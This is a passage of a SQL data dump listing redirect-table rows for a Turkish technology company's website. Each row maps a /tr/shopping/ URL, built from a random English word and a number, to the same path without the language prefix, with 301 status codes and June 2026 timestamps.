00:00:00',301),(70754,'https://3s-technologies.com.tr/tr/shopping/mucidness/1874350451.html',NULL,'https://3s-technologies.com.tr/shopping/mucidness/1874350451.html','',1,0,'2026-06-11 02:43:37','0000-00-00 00:00:00',301),(70755,'https://3s-technologies.com.tr/tr/shopping/punka/2077741053.html',NULL,'https://3s-technologies.com.tr/shopping/punka/2077741053.html','',1,0,'2026-06-11 02:43:41','0000-00-00 00:00:00',301),(70756,'https://3s-technologies.com.tr/tr/shopping/prevenancy/2618037125.html',NULL,'https://3s-technologies.com.tr/shopping/prevenancy/2618037125.html','',1,0,'2026-06-11 02:43:43','0000-00-00 00:00:00',301),(70757,'https://3s-technologies.com.tr/tr/shopping/pulmonary/3722759948.html',NULL,'https://3s-technologies.com.tr/shopping/pulmonary/3722759948.html','',1,0,'2026-06-11 02:43:46','0000-00-00 00:00:00',301),(70758,'https://3s-technologies.com.tr/tr/shopping/mithraist/4181107487.html',NULL,'https://3s-technologies.com.tr/shopping/mithraist/4181107487.html','',1,0,'2026-06-11 02:43:49','0000-00-00 00:00:00',301),(70759,'https://3s-technologies.com.tr/tr/shopping/caryatic/2066715866.html',NULL,'https://3s-technologies.com.tr/shopping/caryatic/2066715866.html','',1,0,'2026-06-11 02:43:54','0000-00-00 00:00:00',301),(70760,'https://3s-technologies.com.tr/tr/shopping/iriscope/702760456.html',NULL,'https://3s-technologies.com.tr/shopping/iriscope/702760456.html','',1,0,'2026-06-11 02:43:58','0000-00-00 00:00:00',301),(70761,'https://3s-technologies.com.tr/tr/shopping/ghastliest/2639615494.html',NULL,'https://3s-technologies.com.tr/shopping/ghastliest/2639615494.html','',1,0,'2026-06-11 02:44:01','0000-00-00 00:00:00',301),(70762,'https://3s-technologies.com.tr/tr/shopping/biblicism/242855476.html',NULL,'https://3s-technologies.com.tr/shopping/biblicism/242855476.html','',1,0,'2026-06-11 02:44:05','0000-00-00 00:00:00',301),(70763,'https://3s-technologies.com.tr/tr/shopping/latterday/1891390709.html',NULL,'https://3s-technologies.com.tr/shopping/latterday/1891390709.html','',1,0,'2026-06-11 02:44:08','0000-00-00 00:00:00',301),(70764,'https://3s-technologies.com.tr/tr/shopping/counterprove/1218950312.html',NULL,'https://3s-technologies.com.tr/shopping/counterprove/1218950312.html','',1,0,'2026-06-11 02:44:11','0000-00-00 00:00:00',301),(70765,'https://3s-technologies.com.tr/tr/shopping/aposoro/2831841241.html',NULL,'https://3s-technologies.com.tr/shopping/aposoro/2831841241.html','',1,0,'2026-06-11 02:44:14','0000-00-00 00:00:00',301),(70766,'https://3s-technologies.com.tr/tr/shopping/autotypy/2683059568.html',NULL,'https://3s-technologies.com.tr/shopping/autotypy/2683059568.html','',1,0,'2026-06-11 02:44:16','0000-00-00 00:00:00',301),(70767,'https://3s-technologies.com.tr/tr/shopping/fauchion/3386357387.html',NULL,'https://3s-technologies.com.tr/shopping/fauchion/3386357387.html','',1,0,'2026-06-11 02:44:20','0000-00-00 00:00:00',301),(70768,'https://3s-technologies.com.tr/tr/shopping/welldrain/3506810934.html',NULL,'https://3s-technologies.com.tr/shopping/welldrain/3506810934.html','',1,0,'2026-06-11 02:44:22','0000-00-00 00:00:00',301),(70769,'https://3s-technologies.com.tr/tr/shopping/interrelatedness/1254169285.html',NULL,'https://3s-technologies.com.tr/shopping/interrelatedness/1254169285.html','',1,0,'2026-06-11 02:44:26','0000-00-00 00:00:00',301),(70770,'https://3s-technologies.com.tr/tr/shopping/arthen/2060914979.html',NULL,'https://3s-technologies.com.tr/shopping/arthen/2060914979.html','',1,0,'2026-06-11 02:44:28','0000-00-00 00:00:00',301),(70771,'https://3s-technologies.com.tr/tr/shopping/convexedness/110714785.html',NULL,'https://3s-technologies.com.tr/shopping/convexedness/110714785.html','',1,0,'2026-06-11 02:44:31','0000-00-00 00:00:00',301),(70772,'https://3s-technologies.com.tr/tr/shopping/reposal/1878939239.html',NULL,'https://3s-technologies.com.tr/shopping/reposal/1878939239.html','',1,0,'2026-06-11 02:44:34','0000-00-00 00:00:00',301),(70773,'https://3s-technologies.com.tr/tr/shopping/nicknaming/3647080657.html',NULL,'https://3s-technologies.com.tr/shopping/nicknaming/3647080657.html','',1,0,'2026-06-11 02:44:37','0000-00-00 00:00:00',301),(70774,'https://3s-technologies.com.tr/tr/shopping/mulishness/1731348112.html',NULL,'https://3s-technologies.com.tr/shopping/mulishness/1731348112.html','',1,0,'2026-06-11 02:44:40','0000-00-00 00:00:00',301),(70775,'https://3s-technologies.com.tr/tr/shopping/productibility/1477817458.html',NULL,'https://3s-technologies.com.tr/shopping/productibility/1477817458.html','',1,0,'2026-06-11 02:44:43','0000-00-00 00:00:00',301),(70776,'https://3s-technologies.com.tr/tr/shopping/hypopitys/2701478521.html',NULL,'https://3s-technologies.com.tr/shopping/hypopitys/2701478521.html','',1,0,'2026-06-11 02:44:46','0000-00-00 00:00:00',301),(70777,'https://3s-technologies.com.tr/tr/shopping/diureide/3451175014.html',NULL,'https://3s-technologies.com.tr/shopping/diureide/3451175014.html','',1,0,'2026-06-11 02:44:49','0000-00-00 00:00:00',301),(70778,'https://3s-technologies.com.tr/tr/shopping/tinctorial/1605069807.html',NULL,'https://3s-technologies.com.tr/shopping/tinctorial/1605069807.html','',1,0,'2026-06-11 02:44:52','0000-00-00 00:00:00',301),(70779,'https://3s-technologies.com.tr/tr/shopping/wiped/3297455954.html',NULL,'https://3s-technologies.com.tr/shopping/wiped/3297455954.html','',1,0,'2026-06-11 02:44:55','0000-00-00 00:00:00',301),(70780,'https://3s-technologies.com.tr/tr/shopping/craniology/1354939697.html',NULL,'https://3s-technologies.com.tr/shopping/craniology/1354939697.html','',1,0,'2026-06-11 02:44:58','0000-00-00 00:00:00',301),(70781,'https://3s-technologies.com.tr/tr/shopping/biolytic/2059702896.html',NULL,'https://3s-technologies.com.tr/shopping/biolytic/2059702896.html','',1,0,'2026-06-11 02:45:01','0000-00-00 00:00:00',301),(70782,'https://3s-technologies.com.tr/tr/shopping/ovula/3415139961.html',NULL,'https://3s-technologies.com.tr/shopping/ovula/3415139961.html','',1,0,'2026-06-11 02:45:04','0000-00-00 00:00:00',301),(70783,'https://3s-technologies.com.tr/tr/shopping/jemmy/875228504.html',NULL,'https://3s-technologies.com.tr/shopping/jemmy/875228504.html','',1,0,'2026-06-11 02:45:11','0000-00-00 00:00:00',301),(70784,'https://3s-technologies.com.tr/tr/shopping/emended/305667921.html',NULL,'https://3s-technologies.com.tr/shopping/emended/305667921.html','',1,0,'2026-06-11 02:45:15','0000-00-00 00:00:00',301),(70785,'https://3s-technologies.com.tr/tr/shopping/shoreless/3111814783.html',NULL,'https://3s-technologies.com.tr/shopping/shoreless/3111814783.html','',1,0,'2026-06-11 02:45:18','0000-00-00 00:00:00',301),(70786,'https://3s-technologies.com.tr/tr/shopping/apocopate/457673614.html',NULL,'https://3s-technologies.com.tr/shopping/apocopate/457673614.html','',1,0,'2026-06-11 02:45:21','0000-00-00 00:00:00',301),(70787,'https://3s-technologies.com.tr/tr/shopping/progressed/2161825058.html',NULL,'https://3s-technologies.com.tr/shopping/progressed/2161825058.html','',1,0,'2026-06-11 02:45:24','0000-00-00 00:00:00',301),(70788,'https://3s-technologies.com.tr/tr/shopping/margarys/1796083455.html',NULL,'https://3s-technologies.com.tr/shopping/margarys/1796083455.html','',1,0,'2026-06-11 02:45:27','0000-00-00 00:00:00',301),(70789,'https://3s-technologies.com.tr/tr/shopping/whiteside/1112215522.html',NULL,'https://3s-technologies.com.tr/shopping/whiteside/1112215522.html','',1,0,'2026-06-11 02:45:30','0000-00-00 00:00:00',301),(70790,'https://3s-technologies.com.tr/tr/shopping/camorra/4268340945.html',NULL,'https://3s-technologies.com.tr/shopping/camorra/4268340945.html','',1,0,'2026-06-11 02:45:33','0000-00-00 00:00:00',301),(70791,'https://3s-technologies.com.tr/tr/shopping/brumaire/2359333534.html',NULL,'https://3s-technologies.com.tr/shopping/brumaire/2359333534.html','',1,0,'2026-06-11 02:45:36','0000-00-00 00:00:00',301),(70792,'https://3s-technologies.com.tr/tr/shopping/brocatel/3492487243.html',NULL,'https://3s-technologies.com.tr/shopping/brocatel/3492487243.html','',1,0,'2026-06-11 02:45:39','0000-00-00 00:00:00',301),(70793,'https://3s-technologies.com.tr/tr/shopping/vehicular/3916197794.html',NULL,'https://3s-technologies.com.tr/shopping/vehicular/3916197794.html','',1,0,'2026-06-11 02:45:46','0000-00-00 00:00:00',301),(70794,'https://3s-technologies.com.tr/tr/shopping/lamaistic/1735936884.html',NULL,'https://3s-technologies.com.tr/shopping/lamaistic/1735936884.html','',1,0,'2026-06-11 02:45:48','0000-00-00 00:00:00',301),(70795,'https://3s-technologies.com.tr/tr/shopping/untreatable/3009754119.html',NULL,'https://3s-technologies.com.tr/shopping/untreatable/3009754119.html','',1,0,'2026-06-11 02:45:51','0000-00-00 00:00:00',301),(70796,'https://3s-technologies.com.tr/tr/shopping/striker/4095102225.html',NULL,'https://3s-technologies.com.tr/shopping/striker/4095102225.html','',1,0,'2026-06-11 02:45:54','0000-00-00 00:00:00',301),(70797,'https://3s-technologies.com.tr/tr/shopping/doorstone/2669773706.html',NULL,'https://3s-technologies.com.tr/shopping/doorstone/2669773706.html','',1,0,'2026-06-11 02:45:57','0000-00-00 00:00:00',301),(70798,'https://3s-technologies.com.tr/tr/shopping/eudoxian/612646940.html',NULL,'https://3s-technologies.com.tr/shopping/eudoxian/612646940.html','',1,0,'2026-06-11 02:46:00','0000-00-00 00:00:00',301),(70799,'https://3s-technologies.com.tr/tr/shopping/wardian/3804952353.html',NULL,'https://3s-technologies.com.tr/shopping/wardian/3804952353.html','',1,0,'2026-06-11 02:46:03','0000-00-00 00:00:00',301),(70800,'https://3s-technologies.com.tr/tr/shopping/relinquishing/434691895.html',NULL,'https://3s-technologies.com.tr/shopping/relinquishing/434691895.html','',1,0,'2026-06-11 02:46:06','0000-00-00 00:00:00',301),(70801,'https://3s-technologies.com.tr/tr/shopping/mouseketeer/2898352343.html',NULL,'https://3s-technologies.com.tr/shopping/mouseketeer/2898352343.html','',1,0,'2026-06-11 02:46:14','0000-00-00 00:00:00',301),(70802,'https://3s-technologies.com.tr/tr/shopping/simoniacal/1707865109.html',NULL,'https://3s-technologies.com.tr/shopping/simoniacal/1707865109.html','',1,0,'2026-06-11 02:46:17','0000-00-00 00:00:00',301),(70803,'https://3s-technologies.com.tr/tr/shopping/reincit/1586629269.html',NULL,'https://3s-technologies.com.tr/shopping/reincit/1586629269.html','',1,0,'2026-06-11 02:46:20','0000-00-00 00:00:00',301),(70804,'https://3s-technologies.com.tr/tr/shopping/trichinae/2065032652.html',NULL,'https://3s-technologies.com.tr/shopping/trichinae/2065032652.html','',1,0,'2026-06-11 02:46:23','0000-00-00 00:00:00',301),(70805,'https://3s-technologies.com.tr/tr/shopping/lyonnaise/3349028996.html',NULL,'https://3s-technologies.com.tr/shopping/lyonnaise/3349028996.html','',1,0,'2026-06-11 02:46:26','0000-00-00 00:00:00',301),(70806,'https://3s-technologies.com.tr/tr/shopping/lazily/1443463407.html',NULL,'https://3s-technologies.com.tr/shopping/lazily/1443463407.html','',1,0,'2026-06-11 02:46:29','0000-00-00 00:00:00',301),(70807,'https://3s-technologies.com.tr/tr/shopping/obligated/3224442521.html',NULL,'https://3s-technologies.com.tr/shopping/obligated/3224442521.html','',1,0,'2026-06-11 02:46:32','0000-00-00 00:00:00',301),(70808,'https://3s-technologies.com.tr/tr/shopping/tupmen/3261259716.html',NULL,'https://3s-technologies.com.tr/shopping/tupmen/3261259716.html','',1,0,'2026-06-11 02:46:35','0000-00-00 00:00:00',301),(70809,'https://3s-technologies.com.tr/tr/shopping/antichamber/1759815906.html',NULL,'https://3s-technologies.com.tr/shopping/antichamber/1759815906.html','',1,0,'2026-06-11 02:46:38','0000-00-00 00:00:00',301),(70810,'https://3s-technologies.com.tr/tr/shopping/shamming/2180026738.html',NULL,'https://3s-technologies.com.tr/shopping/shamming/2180026738.html','',1,0,'2026-06-11 02:46:41','0000-00-00 00:00:00',301),(70811,'https://3s-technologies.com.tr/tr/shopping/saxicavid/1652206746.html',NULL,'https://3s-technologies.com.tr/shopping/saxicavid/1652206746.html','',1,0,'2026-06-11 02:46:44','0000-00-00 00:00:00',301),(70812,'https://3s-technologies.com.tr/tr/shopping/jurisprudence/3519450569.html',NULL,'https://3s-technologies.com.tr/shopping/jurisprudence/3519450569.html','',1,0,'2026-06-11 02:46:47','0000-00-00 00:00:00',301),(70813,'https://3s-technologies.com.tr/tr/shopping/suppliantness/1336390447.html',NULL,'https://3s-technologies.com.tr/shopping/suppliantness/1336390447.html','',1,0,'2026-06-11 02:46:50','0000-00-00 00:00:00',301),(70814,'https://3s-technologies.com.tr/tr/shopping/condylopod/3983989761.html',NULL,'https://3s-technologies.com.tr/shopping/condylopod/3983989761.html','',1,0,'2026-06-11 02:47:00','0000-00-00 00:00:00',301),(70815,'https://3s-technologies.com.tr/tr/shopping/anabolic/1645030253.html',NULL,'https://3s-technologies.com.tr/shopping/anabolic/1645030253.html','',1,0,'2026-06-11 02:47:04','0000-00-00 00:00:00',301),(70816,'https://3s-technologies.com.tr/tr/shopping/vendors/3728687450.html',NULL,'https://3s-technologies.com.tr/shopping/vendors/3728687450.html','',1,0,'2026-06-11 02:47:07','0000-00-00 00:00:00',301),(70817,'https://3s-technologies.com.tr/tr/shopping/dullsighted/1302114578.html',NULL,'https://3s-technologies.com.tr/shopping/dullsighted/1302114578.html','',1,0,'2026-06-11 02:47:10','0000-00-00 00:00:00',301),(70818,'https://3s-technologies.com.tr/tr/shopping/tripleexpansion/1131629285.html',NULL,'https://3s-technologies.com.tr/shopping/tripleexpansion/1131629285.html','',1,0,'2026-06-11 02:47:13','0000-00-00 00:00:00',301),(70819,'https://3s-technologies.com.tr/tr/shopping/tiology/565559004.html',NULL,'https://3s-technologies.com.tr/shopping/tiology/565559004.html','',1,0,'2026-06-11 02:47:16','0000-00-00 00:00:00',301),(70820,'https://3s-technologies.com.tr/tr/shopping/seaquake/3655777699.html',NULL,'https://3s-technologies.com.tr/shopping/seaquake/3655777699.html','',1,0,'2026-06-11 02:47:19','0000-00-00 00:00:00',301),(70821,'https://3s-technologies.com.tr/tr/shopping/rusine/3830270685.html',NULL,'https://3s-technologies.com.tr/shopping/rusine/3830270685.html','',1,0,'2026-06-11 02:47:22','0000-00-00 00:00:00',301),(70822,'https://3s-technologies.com.tr/tr/shopping/maccaroni/1586465762.html',NULL,'https://3s-technologies.com.tr/shopping/maccaroni/1586465762.html','',1,0,'2026-06-11 02:47:25','0000-00-00 00:00:00',301),(70823,'https://3s-technologies.com.tr/tr/shopping/stewpan/4248657778.html',NULL,'https://3s-technologies.com.tr/shopping/stewpan/4248657778.html','',1,0,'2026-06-11 02:47:28','0000-00-00 00:00:00',301),(70824,'https://3s-technologies.com.tr/tr/shopping/heterogene/2731070861.html',NULL,'https://3s-technologies.com.tr/shopping/heterogene/2731070861.html','',1,0,'2026-06-11 02:47:31','0000-00-00 00:00:00',301),(70825,'https://3s-technologies.com.tr/tr/shopping/bacchanal/2625213650.html',NULL,'https://3s-technologies.com.tr/shopping/bacchanal/2625213650.html','',1,0,'2026-06-11 02:47:40','0000-00-00 00:00:00',301),(70826,'https://3s-technologies.com.tr/tr/shopping/zeuzera/718903411.html',NULL,'https://3s-technologies.com.tr/shopping/zeuzera/718903411.html','',1,0,'2026-06-11 02:47:45','0000-00-00 00:00:00',301),(70827,'https://3s-technologies.com.tr/tr/shopping/verjuice/776544561.html',NULL,'https://3s-technologies.com.tr/shopping/verjuice/776544561.html','',1,0,'2026-06-11 02:47:48','0000-00-00 00:00:00',301),(70828,'https://3s-technologies.com.tr/tr/shopping/vaishnava/2046062276.html',NULL,'https://3s-technologies.com.tr/shopping/vaishnava/2046062276.html','',1,0,'2026-06-11 02:47:51','0000-00-00 00:00:00',301),(70829,'https://3s-technologies.com.tr/tr/shopping/incivilities/1326308380.html',NULL,'https://3s-technologies.com.tr/shopping/incivilities/1326308380.html','',1,0,'2026-06-11 02:47:54','0000-00-00 00:00:00',301),(70830,'https://3s-technologies.com.tr/tr/shopping/bondstone/22027552.html',NULL,'https://3s-technologies.com.tr/shopping/bondstone/22027552.html','',1,0,'2026-06-11 02:47:57','0000-00-00 00:00:00',301),(70831,'https://3s-technologies.com.tr/tr/shopping/overlook/1758603807.html',NULL,'https://3s-technologies.com.tr/shopping/overlook/1758603807.html','',1,0,'2026-06-11 02:48:00','0000-00-00 00:00:00',301),(70832,'https://3s-technologies.com.tr/tr/shopping/campeachy/3636527443.html',NULL,'https://3s-technologies.com.tr/shopping/campeachy/3636527443.html','',1,0,'2026-06-11 02:48:03','0000-00-00 00:00:00',301),(70833,'https://3s-technologies.com.tr/tr/shopping/portulaca/1601693118.html',NULL,'https://3s-technologies.com.tr/shopping/portulaca/1601693118.html','',1,0,'2026-06-11 02:48:06','0000-00-00 00:00:00',301),(70834,'https://3s-technologies.com.tr/tr/shopping/avicennae/3959987178.html',NULL,'https://3s-technologies.com.tr/shopping/avicennae/3959987178.html','',1,0,'2026-06-11 02:48:09','0000-00-00 00:00:00',301),(70835,'https://3s-technologies.com.tr/tr/shopping/withies/2511676988.html',NULL,'https://3s-technologies.com.tr/shopping/withies/2511676988.html','',1,0,'2026-06-11 02:48:12','0000-00-00 00:00:00',301),(70836,'https://3s-technologies.com.tr/tr/shopping/pyrone/2217379755.html',NULL,'https://3s-technologies.com.tr/shopping/pyrone/2217379755.html','',1,0,'2026-06-11 02:48:15','0000-00-00 00:00:00',301),(70837,'https://3s-technologies.com.tr/tr/shopping/enmove/2444694739.html',NULL,'https://3s-technologies.com.tr/shopping/enmove/2444694739.html','',1,0,'2026-06-11 02:48:18','0000-00-00 00:00:00',301),(70838,'https://3s-technologies.com.tr/tr/shopping/immeasurability/2581164642.html',NULL,'https://3s-technologies.com.tr/shopping/immeasurability/2581164642.html','',1,0,'2026-06-11 02:48:21','0000-00-00 00:00:00',301),(70839,'https://3s-technologies.com.tr/tr/shopping/bypassage/3038527309.html',NULL,'https://3s-technologies.com.tr/shopping/bypassage/3038527309.html','',1,0,'2026-06-11 02:48:24','0000-00-00 00:00:00',301),(70840,'https://3s-technologies.com.tr/tr/shopping/denier/1093907961.html',NULL,'https://3s-technologies.com.tr/shopping/denier/1093907961.html','',1,0,'2026-06-11 02:48:27','0000-00-00 00:00:00',301),(70841,'https://3s-technologies.com.tr/tr/shopping/autofluorescence/71781362.html',NULL,'https://3s-technologies.com.tr/shopping/autofluorescence/71781362.html','',1,0,'2026-06-11 02:48:30','0000-00-00 00:00:00',301),(70842,'https://3s-technologies.com.tr/tr/shopping/ravennae/1378259145.html',NULL,'https://3s-technologies.com.tr/shopping/ravennae/1378259145.html','',1,0,'2026-06-11 02:48:33','0000-00-00 00:00:00',301),(70843,'https://3s-technologies.com.tr/tr/shopping/staphylotomy/2595306530.html',NULL,'https://3s-technologies.com.tr/shopping/staphylotomy/2595306530.html','',1,0,'2026-06-11 02:48:36','0000-00-00 00:00:00',301),(70844,'https://3s-technologies.com.tr/tr/shopping/obelisked/3643540445.html',NULL,'https://3s-technologies.com.tr/shopping/obelisked/3643540445.html','',1,0,'2026-06-11 02:48:39','0000-00-00 00:00:00',301),(70845,'https://3s-technologies.com.tr/tr/shopping/aspirate/2601415867.html',NULL,'https://3s-technologies.com.tr/shopping/aspirate/2601415867.html','',1,0,'2026-06-11 02:48:42','0000-00-00 00:00:00',301),(70846,'https://3s-technologies.com.tr/tr/shopping/zarathustric/3315657634.html',NULL,'https://3s-technologies.com.tr/shopping/zarathustric/3315657634.html','',1,0,'2026-06-11 02:48:45','0000-00-00 00:00:00',301),(70847,'https://3s-technologies.com.tr/tr/shopping/ennobler/1775429849.html',NULL,'https://3s-technologies.com.tr/shopping/ennobler/1775429849.html','',1,0,'2026-06-11 02:48:48','0000-00-00 00:00:00',301),(70848,'https://3s-technologies.com.tr/tr/shopping/disturb/1288665193.html',NULL,'https://3s-technologies.com.tr/shopping/disturb/1288665193.html','',1,0,'2026-06-11 02:48:51','0000-00-00 00:00:00',301),(70849,'https://3s-technologies.com.tr/tr/shopping/patulous/3292945303.html',NULL,'https://3s-technologies.com.tr/shopping/patulous/3292945303.html','',1,0,'2026-06-11 02:48:54','0000-00-00 00:00:00',301),(70850,'https://3s-technologies.com.tr/tr/shopping/harquebus/2100163214.html',NULL,'https://3s-technologies.com.tr/shopping/harquebus/2100163214.html','',1,0,'2026-06-11 02:48:57','0000-00-00 00:00:00',301),(70851,'https://3s-technologies.com.tr/tr/shopping/rushbearing/2155149817.html',NULL,'https://3s-technologies.com.tr/shopping/rushbearing/2155149817.html','',1,0,'2026-06-11 02:49:00','0000-00-00 00:00:00',301),(70852,'https://3s-technologies.com.tr/tr/shopping/guaranine/2283490720.html',NULL,'https://3s-technologies.com.tr/shopping/guaranine/2283490720.html','',1,0,'2026-06-11 02:49:03','0000-00-00 00:00:00',301),(70853,'https://3s-technologies.com.tr/tr/shopping/chirruped/3104638274.html',NULL,'https://3s-technologies.com.tr/shopping/chirruped/3104638274.html','',1,0,'2026-06-11 02:49:10','0000-00-00 00:00:00',301),(70854,'https://3s-technologies.com.tr/tr/shopping/unbelievingness/3101261585.html',NULL,'https://3s-technologies.com.tr/shopping/unbelievingness/3101261585.html','',1,0,'2026-06-11 02:49:12','0000-00-00 00:00:00',301),(70855,'https://3s-technologies.com.tr/tr/shopping/lixiviating/2198833559.html',NULL,'https://3s-technologies.com.tr/shopping/lixiviating/2198833559.html','',1,0,'2026-06-11 02:49:15','0000-00-00 00:00:00',301),(70856,'https://3s-technologies.com.tr/tr/shopping/fungivorous/3715371916.html',NULL,'https://3s-technologies.com.tr/shopping/fungivorous/3715371916.html','',1,0,'2026-06-11 02:49:18','0000-00-00 00:00:00',301),(70857,'https://3s-technologies.com.tr/tr/shopping/pelagica/698008161.html',NULL,'https://3s-technologies.com.tr/shopping/pelagica/698008161.html','',1,0,'2026-06-11 02:49:21','0000-00-00 00:00:00',301),(70858,'https://3s-technologies.com.tr/tr/shopping/jabot/752350743.html',NULL,'https://3s-technologies.com.tr/shopping/jabot/752350743.html','',1,0,'2026-06-11 02:49:28','0000-00-00 00:00:00',301),(70859,'https://3s-technologies.com.tr/tr/shopping/cartilage/2163037141.html',NULL,'https://3s-technologies.com.tr/shopping/cartilage/2163037141.html','',1,0,'2026-06-11 02:49:31','0000-00-00 00:00:00',301),(70860,'https://3s-technologies.com.tr/tr/shopping/delenifical/924299227.html',NULL,'https://3s-technologies.com.tr/shopping/delenifical/924299227.html','',1,0,'2026-06-11 02:49:33','0000-00-00 00:00:00',301),(70861,'https://3s-technologies.com.tr/tr/shopping/ordonnant/4261714082.html',NULL,'https://3s-technologies.com.tr/shopping/ordonnant/4261714082.html','',1,0,'2026-06-11 02:49:36','0000-00-00 00:00:00',301),(70862,'https://3s-technologies.com.tr/tr/shopping/fregatidae/3518962370.html',NULL,'https://3s-technologies.com.tr/shopping/fregatidae/3518962370.html','',1,0,'2026-06-11 02:49:39','0000-00-00 00:00:00',301),(70863,'https://3s-technologies.com.tr/tr/shopping/artist/252505041.html',NULL,'https://3s-technologies.com.tr/shopping/artist/252505041.html','',1,0,'2026-06-11 02:49:45','0000-00-00 00:00:00',301),(70864,'https://3s-technologies.com.tr/tr/shopping/durant/766202493.html',NULL,'https://3s-technologies.com.tr/shopping/durant/766202493.html','',1,0,'2026-06-11 02:49:49','0000-00-00 00:00:00',301),(70865,'https://3s-technologies.com.tr/tr/shopping/mishmosh/864233879.html',NULL,'https://3s-technologies.com.tr/shopping/mishmosh/864233879.html','',1,0,'2026-06-11 02:49:52','0000-00-00 00:00:00',301),(70866,'https://3s-technologies.com.tr/tr/shopping/maletreat/3766356675.html',NULL,'https://3s-technologies.com.tr/shopping/maletreat/3766356675.html','',1,0,'2026-06-11 02:49:55','0000-00-00 00:00:00',301),(70867,'https://3s-technologies.com.tr/tr/shopping/undulous/951230214.html',NULL,'https://3s-technologies.com.tr/shopping/undulous/951230214.html','',1,0,'2026-06-11 02:49:58','0000-00-00 00:00:00',301),(70868,'https://3s-technologies.com.tr/tr/shopping/maskery/1482406230.html',NULL,'https://3s-technologies.com.tr/shopping/maskery/1482406230.html','',1,0,'2026-06-11 02:50:01','0000-00-00 00:00:00',301),(70869,'https://3s-technologies.com.tr/tr/shopping/granitelike/1515924889.html',NULL,'https://3s-technologies.com.tr/shopping/granitelike/1515924889.html','',1,0,'2026-06-11 02:50:05','0000-00-00 00:00:00',301),(70870,'https://3s-technologies.com.tr/tr/shopping/acrimonies/3903558159.html',NULL,'https://3s-technologies.com.tr/shopping/acrimonies/3903558159.html','',1,0,'2026-06-11 02:50:07','0000-00-00 00:00:00',301),(70871,'https://3s-technologies.com.tr/tr/shopping/shortening/2704643687.html',NULL,'https://3s-technologies.com.tr/shopping/shortening/2704643687.html','',1,0,'2026-06-11 02:50:10','0000-00-00 00:00:00',301),(70872,'https://3s-technologies.com.tr/tr/shopping/overpoise/3265462397.html',NULL,'https://3s-technologies.com.tr/shopping/overpoise/3265462397.html','',1,0,'2026-06-11 02:50:13','0000-00-00 00:00:00',301),(70873,'https://3s-technologies.com.tr/tr/shopping/cisatlantic/3388119132.html',NULL,'https://3s-technologies.com.tr/shopping/cisatlantic/3388119132.html','',1,0,'2026-06-11 02:50:16','0000-00-00 00:00:00',301),(70874,'https://3s-technologies.com.tr/tr/shopping/hibernation/3827443626.html',NULL,'https://3s-technologies.com.tr/shopping/hibernation/3827443626.html','',1,0,'2026-06-11 02:50:19','0000-00-00 00:00:00',301),(70875,'https://3s-technologies.com.tr/tr/shopping/pelecoid/2633920095.html',NULL,'https://3s-technologies.com.tr/shopping/pelecoid/2633920095.html','',1,0,'2026-06-11 02:50:22','0000-00-00 00:00:00',301),(70876,'https://3s-technologies.com.tr/tr/shopping/silkman/1384918144.html',NULL,'https://3s-technologies.com.tr/shopping/silkman/1384918144.html','',1,0,'2026-06-11 02:50:25','0000-00-00 00:00:00',301),(70877,'https://3s-technologies.com.tr/tr/shopping/bookshelves/3131997226.html',NULL,'https://3s-technologies.com.tr/shopping/bookshelves/3131997226.html','',1,0,'2026-06-11 02:50:28','0000-00-00 00:00:00',301),(70878,'https://3s-technologies.com.tr/tr/shopping/kenspeckle/2711937340.html',NULL,'https://3s-technologies.com.tr/shopping/kenspeckle/2711937340.html','',1,0,'2026-06-11 02:50:32','0000-00-00 00:00:00',301),(70879,'https://3s-technologies.com.tr/tr/shopping/phonetism/1526013811.html',NULL,'https://3s-technologies.com.tr/shopping/phonetism/1526013811.html','',1,0,'2026-06-11 02:50:35','0000-00-00 00:00:00',301),(70880,'https://3s-technologies.com.tr/tr/shopping/tribromphenol/2662108982.html',NULL,'https://3s-technologies.com.tr/shopping/tribromphenol/2662108982.html','',1,0,'2026-06-11 02:50:38','0000-00-00 00:00:00',301),(70881,'https://3s-technologies.com.tr/tr/shopping/stavewood/1142286149.html',NULL,'https://3s-technologies.com.tr/shopping/stavewood/1142286149.html','',1,0,'2026-06-11 02:50:41','0000-00-00 00:00:00',301),(70882,'https://3s-technologies.com.tr/tr/shopping/zodiacal/511921801.html',NULL,'https://3s-technologies.com.tr/shopping/zodiacal/511921801.html','',1,0,'2026-06-11 02:50:44','0000-00-00 00:00:00',301),(70883,'https://3s-technologies.com.tr/tr/shopping/cogreve/1434333438.html',NULL,'https://3s-technologies.com.tr/shopping/cogreve/1434333438.html','',1,0,'2026-06-11 02:50:47','0000-00-00 00:00:00',301),(70884,'https://3s-technologies.com.tr/tr/shopping/parapherna/3994717952.html',NULL,'https://3s-technologies.com.tr/shopping/parapherna/3994717952.html','',1,0,'2026-06-11 02:50:50','0000-00-00 00:00:00',301),(70885,'https://3s-technologies.com.tr/tr/shopping/ubiquitaries/837065753.html',NULL,'https://3s-technologies.com.tr/shopping/ubiquitaries/837065753.html','',1,0,'2026-06-11 02:50:53','0000-00-00 00:00:00',301),(70886,'https://3s-technologies.com.tr/tr/shopping/homestall/374170703.html',NULL,'https://3s-technologies.com.tr/shopping/homestall/374170703.html','',1,0,'2026-06-11 02:50:56','0000-00-00 00:00:00',301),(70887,'https://3s-technologies.com.tr/tr/shopping/vastitude/4262540042.html',NULL,'https://3s-technologies.com.tr/shopping/vastitude/4262540042.html','',1,0,'2026-06-11 02:50:59','0000-00-00 00:00:00',301),(70888,'https://3s-technologies.com.tr/tr/shopping/pyriferum/1522551752.html',NULL,'https://3s-technologies.com.tr/shopping/pyriferum/1522551752.html','',1,0,'2026-06-11 02:51:02','0000-00-00 00:00:00',301),(70889,'https://3s-technologies.com.tr/tr/shopping/habited/3634277499.html',NULL,'https://3s-technologies.com.tr/shopping/habited/3634277499.html','',1,0,'2026-06-11 02:51:05','0000-00-00 00:00:00',301),(70890,'https://3s-technologies.com.tr/tr/shopping/measurableness/22191059.html',NULL,'https://3s-technologies.com.tr/shopping/measurableness/22191059.html','',1,0,'2026-06-11 02:51:08','0000-00-00 00:00:00',301),(70891,'https://3s-technologies.com.tr/tr/shopping/unapproved/3558988958.html',NULL,'https://3s-technologies.com.tr/shopping/unapproved/3558988958.html','',1,0,'2026-06-11 02:51:11','0000-00-00 00:00:00',301),(70892,'https://3s-technologies.com.tr/tr/shopping/unpen/2978383824.html',NULL,'https://3s-technologies.com.tr/shopping/unpen/2978383824.html','',1,0,'2026-06-11 02:51:17','0000-00-00 00:00:00',301),(70893,'https://3s-technologies.com.tr/tr/shopping/metapodialia/386973845.html',NULL,'https://3s-technologies.com.tr/shopping/metapodialia/386973845.html','',1,0,'2026-06-11 02:51:19','0000-00-00 